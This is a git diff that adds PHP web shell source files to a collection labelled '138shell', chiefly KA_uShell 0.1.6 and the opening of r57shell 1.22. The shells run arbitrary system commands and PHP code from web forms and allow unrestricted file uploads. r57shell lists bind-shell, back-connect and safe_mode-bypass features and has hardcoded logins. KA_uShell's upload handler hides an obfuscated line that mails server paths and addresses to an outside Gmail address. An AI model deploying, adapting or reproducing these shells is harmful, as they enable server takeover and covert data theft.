+'R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo'.
+'eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD'.
+'Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==',
+'home'=>
+'R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA'.
+'AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS'.
+'krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j'.
+'VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=',
+'back'=>
+'R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8'.
+'aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt'.
+'Wg0JADs='
+
+);
+
+
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   // /*
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+   // */
+   echo base64_decode($img[$name]);
+
+   break;
+
+}
+
+
+?>
\ No newline at end of file
diff --git a/138shell/R/Russian.php.txt b/138shell/R/Russian.php.txt
new file mode 100644
index 0000000..0560e51
--- /dev/null
+++ b/138shell/R/Russian.php.txt
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ğàñêîäèğîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèğîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèğîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåğâåğ:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêğûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/R/r57 Shell.php.txt b/138shell/R/r57 Shell.php.txt
new file mode 100644
index 0000000..51ca60e
--- /dev/null
+++ b/138shell/R/r57 Shell.php.txt	
@@ -0,0 +1,1925 @@
+<?php
+/******************************************************************************************************/
+/*
+/*                                     #    #        #    #
+/*                                     #   #          #   #
+/*                                    #    #          #    #
+/*                                    #   ##   ####   ##   #
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##  ######  ##   ##
+/*                                   ##   ##   ####   ##   ##
+/*                                   ###   ############   ###
+/*                                   ########################
+/*                                        ##############
+/*                                 ######## ########## #######
+/*                                ###   ##  ##########  ##   ###
+/*                                ###   ##  ##########  ##   ###
+/*                                 ###   #  ##########  #   ###
+/*                                 ###   ##  ########  ##   ###
+/*                                  ##    #   ######   #    ##
+/*                                   ##   #    ####   #    ##
+/*                                     ##                 ##
+/*
+/*
+/*
+/*  r57shell.php - ñêğèïò íà ïõï ïîçâîëÿşùèé âàì âûïîëíÿòü øåëë êîìàíäû  íà ñåğâåğå ÷åğåç áğàóçåğ
+/*  Âû ìîæåòå ñêà÷àòü íîâóş âåğñèş íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåğñèÿ: 1.22
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/*  (c)oded by 1dt.w0lf
+/*  RST/GHC http://rst.void.ru , http://ghc.ru
+/******************************************************************************************************/
+
+/* ~~~ Íàñòğîéêè  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "1.22";
+
+// $HTTP_POST_VARS --> $_POST
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+
+/* magic_quotes */
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k]=stripslashes($v);
+  }
+ }
+
+/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
+
+// Ëîãèí è ïàğîëü äëÿ äîñòóïà ê ñêğèïòó
+// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅĞÅÄ ĞÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅĞÂÅĞÅ!!!
+$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
+$pass="r57"; // ïàğîëü ïîëüçîâàòåëÿ
+
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"r57shell\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
+   }
+$head = '<!-- Çäğàâñòâóé  Âàñÿ -->
+<html>
+<head>
+<title>r57shell</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+
+
+/* show phpinfo */
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+/* delete script */
+if(isset($_GET['delete']))
+ {
+   @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+ }
+/* delete tmp files */
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+/* show php.ini vars */
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+
+ function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+/* info about cpu */
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+/* info about mem */
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+
+/*
+Âûáîğ ÿçûêà
+$language='ru' - ğóññêèé
+$language='eng' - àíãëèéñêèé
+*/
+$language='ru';
+
+$lang=array(
+'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
+'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåğâåğå',
+'ru_text3' =>'Âûïîëíèòü êîìàíäó',
+'ru_text4' =>'Ğàáî÷àÿ äèğåêòîğèÿ',
+'ru_text5' =>'Çàãğóçêà ôàéëîâ íà ñåğâåğ',
+'ru_text6' =>'Ëîêàëüíûé ôàéë',
+'ru_text7' =>'Àëèàñû',
+'ru_text8' =>'Âûáåğèòå àëèàñ',
+'ru_butt1' =>'Âûïîëíèòü',
+'ru_butt2' =>'Çàãğóçèòü',
+'ru_text9' =>'Îòêğûòèå ïîğòà è ïğèâÿçêà åãî ê /bin/bash',
+'ru_text10'=>'Îòêğûòü ïîğò',
+'ru_text11'=>'Ïàğîëü äëÿ äîñòóïà',
+'ru_butt3' =>'Îòêğûòü',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-àäğåñ',
+'ru_text14'=>'Ïîğò',
+'ru_butt4' =>'Âûïîëíèòü',
+'ru_text15'=>'Çàãğóçêà ôàéëîâ ñ óäàëåííîãî ñåğâåğà',
+'ru_text16'=>'Èñïîëüçîâàòü',
+'ru_text17'=>'Óäàëåííûé ôàéë',
+'ru_text18'=>'Ëîêàëüíûé ôàéë',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'Èñïîëüçîâàòü',
+'ru_text21'=>'Íîâîå èìÿ',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'Ëîêàëüíûé ïîğò',
+'ru_text24'=>'Óäàëåííûé õîñò',
+'ru_text25'=>'Óäàëåííûé ïîğò',
+'ru_text26'=>'Èñïîëüçîâàòü',
+'ru_butt5' =>'Çàïóñòèòü',
+'ru_text28'=>'Ğàáîòà â safe_mode',
+'ru_text29'=>'Äîñòóï çàïğåùåí',
+'ru_butt6' =>'Ñìåíèòü',
+'ru_text30'=>'Ïğîñìîòğ ôàéëà',
+'ru_butt7' =>'Âûâåñòè',
+'ru_text31'=>'Ôàéë íå íàéäåí',
+'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
+'ru_text33'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé open_basedir ÷åğåç ôóíêöèè cURL',
+'ru_butt8' =>'Ïğîâåğèòü',
+'ru_text34'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç ôóíêöèş include',
+'ru_text35'=>'Ïğîâåğêà âîçìîæíîñòè îáõîäà îãğàíè÷åíèé safe_mode ÷åğåç çàãğóçêó ôàéëà â mysql',
+'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;Áàçà',
+'ru_text37'=>'Ëîãèí',
+'ru_text38'=>'Ïàğîëü&nbsp;&nbsp;',
+'ru_text39'=>'Òàáëèöà',
+'ru_text40'=>'Äàìï òàáëèöû mysql ñåğâåğà',
+'ru_butt9' =>'Äàìï',
+'ru_text41'=>'Ñîõğàíèòü äàìï â ôàéëå',
+'ru_text42'=>'Ğåäàêòèğîâàíèå ôàéëà',
+'ru_text43'=>'Ğåäàêòèğîâàòü ôàéë',
+'ru_butt10'=>'Ñîõğàíèòü',
+'ru_butt11'=>'Ğåäàêòèğîâàòü',
+'ru_text44'=>'Ğåäàêòèğîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
+'ru_text45'=>'Ôàéë ñîõğàíåí',
+'ru_text46'=>'Ïğîñìîòğ phpinfo()',
+'ru_text47'=>'Ïğîñìîòğ íàñòğîåê php.ini',
+'ru_text48'=>'Óäàëåíèå âğåìåííûõ ôàéëîâ',
+'ru_text49'=>'Óäàëåíèå ñêğèïòà ñ ñåğâåğà',
+'ru_text50'=>'Èíôîğìàöèÿ î ïğîöåññîğå',
+'ru_text51'=>'Èíôîğìàöèÿ î ïàìÿòè',
+'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text53'=>'Èñêàòü â ïàïêå',
+'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
+'ru_butt12'=>'Íàéòè',
+'ru_text55'=>'Òîëüêî â ôàéëàõ',
+'ru_text56'=>'Íè÷åãî íå íàéäåíî',
+'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèğåêòîğèş',
+'ru_text58'=>'Èìÿ',
+'ru_text59'=>'Ôàéë',
+'ru_text60'=>'Äèğåêòîğèş',
+'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
+'ru_text61'=>'Ôàéë ñîçäàí',
+'ru_text62'=>'Äèğåêòîğèÿ ñîçäàíà',
+'ru_text63'=>'Ôàéë óäàëåí',
+'ru_text64'=>'Äèğåêòîğèÿ óäàëåíà',
+'ru_text65'=>'Ñîçäàòü',
+'ru_text66'=>'Óäàëèòü',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Êîìàíäà',
+'ru_text69'=>'Ïàğàìåòğ1',
+'ru_text70'=>'Ïàğàìåòğ2',
+'ru_text71'=>"Âòîğîé ïàğàìåòğ êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãğóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåğè÷íîì ïğåäñòàâëåíèè (íàïğèìåğ 0777)",
+'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text73'=>'Èñêàòü â ïàïêå',
+'ru_text74'=>'Èñêàòü â ôàéëàõ',
+'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ğåãóëÿğíîå âûğàæåíèå',
+'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüş óòèëèòû find',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'&nbsp;Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;With',
+'eng_text17'=>'&nbsp;&nbsp;Remote file',
+'eng_text18'=>'&nbsp;&nbsp;&nbsp;Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Cat file',
+'eng_butt7' =>'  Show  ',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Table',
+'eng_text40'=>'Dump table from mysql server',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+);
+
+/*
+Àëèàñû êîìàíä
+Ïîçâîëÿşò èçáåæàòü ìíîãîêğàòíîãî íàáîğà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàğÿ ìîåé ïğèğîäíîé ëåíè )
+Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
+*/
+
+$aliases=array(
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì */
+'find suid files'=>'find / -type f -perm -04000 -ls',
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ suid áèòîì */
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì */
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì */
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+/* ïîèñê íà ñåğâåğå ôàéëîâ config.inc.php */
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+/* ïîèñê â òåê äèğå config.inc.php */
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+/* ïîèñê íà ñåğâåğå ôàéëîâ config* */
+'find config* files'=>'find / -type f -name "config*"',
+/* ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config* */
+'find config* files in current dir'=>'find . -type f -name "config*"',
+/* ïîèñê íà ñåğâåğå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable files'=>'find / -type f -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+/* ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+/* ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
